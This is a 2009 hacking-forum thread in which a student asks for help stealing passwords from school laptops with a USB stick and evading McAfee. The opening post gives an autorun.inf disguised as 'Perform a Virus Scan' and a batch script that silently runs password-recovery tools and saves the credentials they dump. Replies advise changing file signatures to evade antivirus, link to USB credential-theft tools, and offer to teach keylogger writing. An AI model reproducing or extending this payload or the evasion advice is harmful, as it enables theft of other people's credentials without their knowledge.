Help to make password stealer/anti-virus shutdown file

Newbie Member
7Apr2009,15:25   #1
Bursty's Avatar
Hi guys,

I need some helping make a .bat or .exe that steals peoples passwords when I insert my USB.

Currently using:

Code:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
And
Code:
start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt
And then I added some anti-virus disable stuff into the .bat, but our laptops at school have McAfee anti-virus and it gets the files on my USB and deletes them on suspiscion.

I was wondering if anyone could write me a script, that steals peoples passwords, and also disables their anti-virus first, without the .bat or .exe being detected in the first place and being deleted.

Help Appreciated, Bursty
Ambitious contributor
7Apr2009,22:11   #2
fourthdimension's Avatar
Why not just change the signatures of those files so they're not detected?
Security Expert
8Apr2009,01:05   #3
indiansword's Avatar
does this sound ETHICAL?

aa aa.
Skilled contributor
8Apr2009,01:36   #4
cpulocksmith's Avatar
ok well you should read this. usb switchblade is a great tool and it works pretty good for some things. it can get all kinds of passwords^^
http://wiki.hak5.org/wiki/USB_Switchblade

Last edited by cpulocksmith; 8Apr2009 at 01:37.. Reason: im an idiot
Ambitious contributor
8Apr2009,01:59   #5
fourthdimension's Avatar
Quote:
Originally Posted by indiansword View Post
does this sound ETHICAL?

aa aa.
Nope. lol So I gave him enough information to answer his question, but he's still gonna have to go learn about hexing to get what he wants.
Newbie Member
8Apr2009,02:34   #6
Bursty's Avatar
Code:
Why not just change the signatures of those files so they're not detected? 

but he's still gonna have to go learn about hexing to get what he wants.
Are you able to write me up a .bat file and .inf with all this stuff in it? Or teach me what this is and how to do it?

Thanks
Invasive contributor
8Apr2009,12:46   #7
neo_vi's Avatar
how to change the signature of a file. I know its by Hexing. But how to find the exact code and what to replace that with
Ambitious contributor
8Apr2009,19:51   #8
fourthdimension's Avatar
Quote:
Originally Posted by neo_vi View Post
how to change the signature of a file. I know its by Hexing. But how to find the exact code and what to replace that with
http://ehsan.soltani.se/?p=57
Go4Expert Member
22Jul2009,03:05   #9
Hex00010's Avatar
First of all Why in the world would u even want to make a keylogger in a .bat If your going to send this to a network A.K.A school im pretty sure there system admin keeps a logs of all events on the system if one appears to yours and the admin sees it and takes a look at the .bat he can easily view the source

Dont make it in VB best advice C# / C/C++ why not vb? You can easily decompile code in VB rather than c# C/c++ If you need help on creating one i wouldnt mind teaching you
Banned
22Jul2009,07:43   #10
naimish's Avatar
Hex00010, I would love to be taught